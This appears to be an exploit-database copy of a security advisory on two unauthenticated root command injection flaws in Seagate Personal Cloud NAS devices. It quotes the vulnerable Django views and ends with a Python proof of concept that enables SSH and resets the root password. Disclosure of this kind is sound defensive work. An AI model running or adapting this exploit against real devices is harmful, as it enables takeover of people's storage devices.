Menu

Search for hundreds of thousands of exploits

"Seagate Personal Cloud - Multiple Vulnerabilities"

Author

Exploit author

SecuriTeam

Platform

Exploit platform

hardware

Release date

Exploit published date

2018-01-11

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# SSD Advisory – Seagate Personal Cloud Multiple Vulnerabilities

## Vulnerabilities summary
The following advisory describes two (2) unauthenticated command injection vulnerabilities.

Seagate Personal Cloud Home Media Storage is the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.

## Credit
An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program

## Vendor response
Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory

## Vulnerabilities details
Seagate Media Server uses Django web framework and is mapped to the .psp extension.

Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.
/etc/lighttpd/conf.d/django-host.conf:


```
fastcgi.server += (
".psp"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   )),
".psp/"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   ))
)
```


URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py.

Two views were found to be affected by unauthenticated command injection.

The affected views are:

- uploadTelemetry
- getLogs

These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module.

This allows an attacker to inject arbitrary system commands, that will be executed with root privileges.

/usr/lib/django_host/seagate_media_server/views.py:


```
@csrf_exempt
def uploadTelemetry(request):
   ts = request.GET.get('TimeStamp','')
   if (checkDBSQLite()) :
      response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
   else :
      if ts == "":
         response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
         return HttpResponse(response);
      cmd = "/usr/local/bin/log_telemetry "+str(ts)
      commands.getoutput(cmd)
   return HttpResponse('{"stat":"ok"}')
```


/usr/lib/django_host/seagate_media_server/views.py:


```
@csrf_exempt
def getLogs (request):
   try:
      cmd_base='/usr/bin/log-extract-manager.sh'
      uID = request.GET.get ( 'arch_id', None )
      time_stamp = request.GET.get ( 'time_stamp', '' )
   
      if uID:
         (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
         if ('In progress' in output) and (uID in output) :
            return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
         elif (status == 0) :
            return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
         else :
            return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
      else:
         (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
         if (status == 0) :
            return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
   
      return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
   except :
      return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
```


Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.

### Proof of Concept
The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.


```
#!/usr/bin/env python
import os
import urllib
   
scheme = 'http'
host = 'personalcloud.local'
port = '80'
path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'
#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'
password = 'Welcome01'
   
cmds = ['ngc --start sshd 2>&1',
      'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
   
for cmd in cmds:
   print 'Running command', repr(cmd)
   cmd = urllib.quote_plus(cmd)
   r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
   print r.read()
   
print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)
```
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2018-10-04 "Cisco Prime Infrastructure - Unauthenticated Remote Code Execution" remote multiple SecuriTeam
2018-04-30 "Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free" dos linux SecuriTeam
2018-01-30 "Hotspot Shield - Information Disclosure" local windows SecuriTeam
2018-01-29 "iBall WRA150N - Multiple Vulnerabilities" webapps hardware SecuriTeam
2018-01-24 "Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape" local multiple SecuriTeam
2018-01-15 "GitStack - Remote Code Execution" webapps php SecuriTeam
2018-01-11 "Seagate Personal Cloud - Multiple Vulnerabilities" remote hardware SecuriTeam
2017-12-26 "Trustwave SWG 11.8.0.27 - SSH Unauthorized Access" remote linux SecuriTeam
2017-12-19 "Ichano AtHome IP Cameras - Multiple Vulnerabilities" remote hardware SecuriTeam
2017-12-13 "vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion" webapps multiple SecuriTeam
2017-12-13 "vBulletin 5 - 'routestring' Remote Code Execution" webapps multiple SecuriTeam
2017-12-06 "Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Remote Code Execution" webapps hardware SecuriTeam
2017-11-28 "Synology StorageManager 5.2 - Root Remote Command Execution" webapps cgi SecuriTeam
2017-11-23 "Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation" local linux SecuriTeam
2017-11-21 "DblTek - Multiple Vulnerabilities" webapps linux SecuriTeam
2017-11-07 "Ametys CMS 4.0.2 - Password Reset" webapps php SecuriTeam
2017-11-03 "GraphicsMagick - Memory Disclosure / Heap Overflow" dos multiple SecuriTeam
2017-11-01 "Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution" remote linux SecuriTeam
2017-10-23 "K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read" dos windows SecuriTeam
2017-10-17 "Linux Kernel - 'AF_PACKET' Use-After-Free" dos linux SecuriTeam
2017-10-17 "Linux Kernel - 'AF_PACKET' Use-After-Free" dos linux SecuriTeam
2017-10-16 "Ikraus Anti Virus 2.16.7 - Remote Code Execution" remote windows SecuriTeam
2017-10-13 "FiberHome - Directory Traversal" webapps linux SecuriTeam
2017-10-09 "PHP Melody 2.7.3 - Multiple Vulnerabilities" webapps php SecuriTeam
2017-10-09 "QNAP HelpDesk < 1.1.12 - SQL Injection" webapps php SecuriTeam
2017-09-11 "Hanbanggaoke IP Camera - Arbitrary Password Change" webapps hardware SecuriTeam
2017-09-07 "McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution" webapps hardware SecuriTeam
2017-08-30 "Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service" dos php SecuriTeam
2017-08-03 "Dashlane - DLL Hijacking" local windows SecuriTeam
2017-08-03 "Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure" webapps hardware SecuriTeam 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected